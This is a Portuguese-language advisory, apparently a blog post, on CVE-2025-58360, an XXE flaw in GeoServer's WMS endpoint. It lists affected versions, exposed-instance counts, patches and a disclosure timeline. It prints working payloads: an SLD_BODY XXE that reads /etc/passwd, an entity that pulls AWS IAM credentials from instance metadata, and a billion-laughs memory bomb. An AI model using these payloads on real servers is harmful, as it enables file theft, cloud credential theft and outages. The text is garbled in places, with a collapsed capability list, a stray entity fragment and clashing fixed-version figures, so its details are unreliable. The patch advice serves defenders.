
CVE-2025-58360

AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:LEste é um XXE clássico, porém devastador, no endpoint GetMap do Web Map Service (WMS).
Atacantes podem:
/etc/passwdgeoserver.xml| Componente | Versões Vulneráveis | Corrigido Em | Status |
|---|---|---|---|
| GeoServer Standalone | 2.26.0 – 2.26.1 ≤ 2.25.5 | 2.26.3, 2.25.6, 2.27.0 | 🔴 Vulnerável |
| Docker (osgeo/geoserver) | 2.26.0 – 2.26.1 ≤ 2.25.5 | 2.26.2+, 2.27.0 | 🔴 Vulnerável |
| Maven org.geoserver:gs-wms | 2.26.0 – 2.26.1 ≤ 2.25.5 | 2.26.2+, 2.25.6 | 🔴 Vulnerável |
| Maven org.geoserver.web:gs-web-app | 2.26.0 – 2.26.1 ≤ 2.25.5 | 2.26.2+, 2.25.6 | 🔴 Vulnerável |
| GeoServer 2.27.x e versões mais recentes | – | Já corrigido | ✅ Seguro |
| Fonte | Instâncias Expostas | Notas |
|---|---|---|
| ZoomEye | ~49.400 | Busca app:"GeoServer" |
| FOFA | ~24.000 | Resultados do último ano |
| Shodan | ~31.000 | Porta 8080 + correspondência de título |
| GobySec | ~20.000 | Varredura de rede pública |
→ Isso representa dezenas de milhares de servidores potencialmente vulneráveis expostos na internet aberta agora mesmo! 🌐
Endpoint: POST /geoserver/wms
Parâmetro-Chave: SLD_BODY (permite XML bruto de estilização)
Caminho de Código Vulnerável: O parser XML não desativa a resolução de entidades externas → XXE clássico.

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<sld:StyledLayerDescriptor xmlns:sld="http://www.opengis.net/sld" version="1.0.0">
<sld:UserLayer>
<sld:LayerFeatureConstraints>
<sld:FeatureTypeConstraint>&xxe;</sld:FeatureTypeConstraint>
</sld:LayerFeatureConstraints>
</sld:UserLayer>
</sld:StyledLayerDescriptor>
→ A resposta contém o conteúdo de /etc/passwd 🎉
<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/">
→ Vaza credenciais temporárias da AWS se estiver rodando em EC2.
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!-- repita até lol9 -->
]>
<lol>&lol9;</lol>
→ Consome gigabytes de RAM em segundos 💥
| Versão | Data de Lançamento | Link de Download |
|---|---|---|
| 2.27.0 | 25 de novembro de 2025 | https://geoserver.org/release/stable/ |
| 2.26.3 | 25 de novembro de 2025 | Patch do branch de manutenção |
| 2.25.6 | 25 de novembro de 2025 | Branch antigo suportado |
Usuários de Docker:
docker pull osgeo/geoserver:2.27.0
<!ENTITY ou SYSTEM "file://| Data | Evento |
|---|---|
| Antes de novembro de 2025 | Descoberto autonomamente pelo scanner de IA XBOW |
| 25 de novembro de 2025 | Divulgação coordenada → patches lançados |
| 25 de novembro de 2025 | CVE atribuído e publicado |
| 26 de novembro de 2025 | PoCs viralizam, varreduras de exposição disparam |
Este é um XXE de manual que atinge uma plataforma geoespacial amplamente implantada, com dezenas de milhares de instâncias expostas à internet.
Os patches foram lançados no mesmo dia da divulgação — parabéns à equipe do GeoServer pela agilidade! 🏆
Mas a janela entre a disponibilidade do patch e a exploração em massa está diminuindo rapidamente.
Se você executa o GeoServer → atualize hoje.
Não se torne a próxima manchete.
Fique seguro, fique brilhante! 🛡️✨